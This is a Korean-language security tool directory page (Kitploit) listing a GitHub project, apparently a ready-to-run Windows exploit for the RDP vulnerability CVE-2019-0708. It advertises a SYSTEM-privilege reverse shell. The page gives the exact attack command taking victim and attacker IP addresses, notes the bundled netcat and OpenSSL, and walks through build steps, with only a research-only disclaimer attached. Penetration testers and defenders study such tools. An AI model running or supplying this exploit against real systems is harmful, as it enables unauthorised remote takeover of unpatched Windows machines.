Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-0708-EXP-Windows — CVE-2019-0708-EXP-Windows 버전 단일 파일 exe 버전, 실행 후 현재 콘솔에서 직접 System 권한 리버스 셸을 획득합니다 | Kitploit
도구/GitHubGitHub/cbwang505/cve-2019-0708-exp-windows
Payload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingRemote Access Tool
GitHubcbwang505/cve-2019-0708-exp-windows

CVE-2019-0708-EXP-Windows

CVE-2019-0708-EXP-Windows 버전 단일 파일 exe 버전, 실행 후 현재 콘솔에서 직접 System 권한 리버스 셸을 획득합니다

저장소 보기
317686년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2019-0708-EXP-Windows-Version

声明 / 고지

作者poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关

→ 저자의 PoC는 연구 목적으로만 제공됩니다. 독자가 이 PoC를 이용하여 다른 행위를 할 경우, 작성자와 무관합니다.

목차

[toc]

소개

CVE-2019-0708-EXP Windows 버전 단일 파일 exe로 실행되며, linux, python, ruby 등이 필요 없습니다. 실행 후 현재 콘솔에서 직접 System 권한 Shell이 리버스됩니다.

컴파일은 전체 정적 라이브러리 모드로 모든 dll을 인라인하며, netcat과 openssl을 통합하고, 진행률 표시줄 표시 및 shell 에코(echo) 조작을 지원합니다.

复现环境 / 재현 환경

  1. 피해자 운영체제 Victim: Windows 7 sp1 x64 운영체제
  2. 공격자 운영체제 Attacker: Windows 10 x64 운영체제
  3. 컴파일 환경 Visual Studio 2013

使用说明 / 사용 설명

  1. CVE-2019-0708-EXP-Release 디렉터리로 이동합니다.
  2. wfreerdp.exe /v:Victim_IP /l:Attacker_IP 실행, 예: wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17

安装教程 / 설치 튜토리얼

  1. FreeRDP-master 프로젝트를 E:\git\KernelResearch\FreeRDP-master\ 경로로 복사합니다.
  2. Openssl 컴파일 환경을 설치하거나, openssl.7z을 C:\openssl\에 직접 압축 해제하여 이미 컴파일된 Openssl 환경을 사용합니다.
  3. Nasm 컴파일 환경을 설치합니다.
  4. cmake-3.15.3-win64-x64.msi를 관리자 권한으로 설치합니다.
  5. C:\Program Files\CMake\bin을 path 환경 변수에 추가합니다.
  6. 컴퓨터를 재시작합니다.
  7. "C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt 실행
  8. 프로젝트를 컴파일합니다. 여전히 파일이 부족하다면 FreeRDP-master-restore.7z에서 복원할 수 있습니다.
Openssl编译环境安装教程 / Openssl 컴파일 환경 설치 튜토리얼
  1. openssl-1.0.2s.tar.gz을 C:\openssl\에 압축 해제합니다.
  2. ActivePerl-5.28.1.0000-MSWin32-x64-fde9aa8a.msi을 설치합니다.
  3. C:\Perl64\bin을 path 환경 변수에 추가합니다.
  4. 시작 메뉴에서 VS2013 x64 네이티브 도구 명령 프롬프트를 엽니다.
  5. perl Configure VC-WIN64A 실행
  6. cd /d C:\openssl\ 실행
  7. ms\do_win64a 실행
  8. 이제 컴파일을 시작합니다. 다음 모드를 사용할 수 있으며, exp에서는 정적 라이브러리 모드를 사용합니다: OpenSSL 동적 라이브러리 컴파일: nmake -f ms\ntdll.mak OpenSSL 정적 라이브러리 컴파일: nmake -f ms\nt.mak OpenSSL 동적 라이브러리 테스트: nmake -f ms\ntdll.mak test OpenSSL 정적 라이브러리 테스트: nmake -f ms\nt.mak test OpenSSL 동적 라이브러리 설치: nmake -f ms\ntdll.mak install OpenSSL 정적 라이브러리 설치: nmake -f ms\nt.mak install 이전 OpenSSL 동적 라이브러리 컴파일을 정리하여 다시 컴파일: nmake -f ms\ntdll.mak clean 이전 OpenSSL 정적 라이브러리 컴파일을 정리하여 다시 컴파일: nmake -f ms\nt.mak clean
  9. 완료 후 직접 out32 디렉터리에서 libeay32.lib와 ssleay32.lib 파일을 찾아 C:\openssl\lib\에 복사합니다.
Nasm编译环境安装教程 / Nasm 컴파일 환경 설치 튜토리얼
  1. nasm-2.14.02-installer-x64.exe를 관리자 권한으로 설치합니다.
  2. C:\Program Files\NASM을 path 환경 변수에 추가합니다.
  3. nasmBuildCustomizations.rar을 압축 해제한 후 그중 3개 파일을 C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\에 복사합니다.
  4. client->common->freerdp-client 프로젝트 디렉터리를 선택하고 우클릭 -> "빌드 종속성" -> "빌드 사용자 지정"을 클릭한 다음 nasm 항목을 체크합니다(masm이 아님에 주의).
  5. freerdp-client 프로젝트에서 임의의 asm 파일을 선택했을 때 우클릭 메뉴에 컴파일 옵션이 나타나면 Nasm 컴파일 환경 설치가 성공한 것입니다.

运行效果 / 실행 결과

点击查看大图

项目托管 / 프로젝트 호스팅

我的poc地址

参与贡献 / 기여

作者来自ZheJiang Guoli Security Technology,邮箱[email protected]

→ 저자는 ZheJiang Guoli Security Technology 소속이며, 이메일: [email protected]

도구 다운로드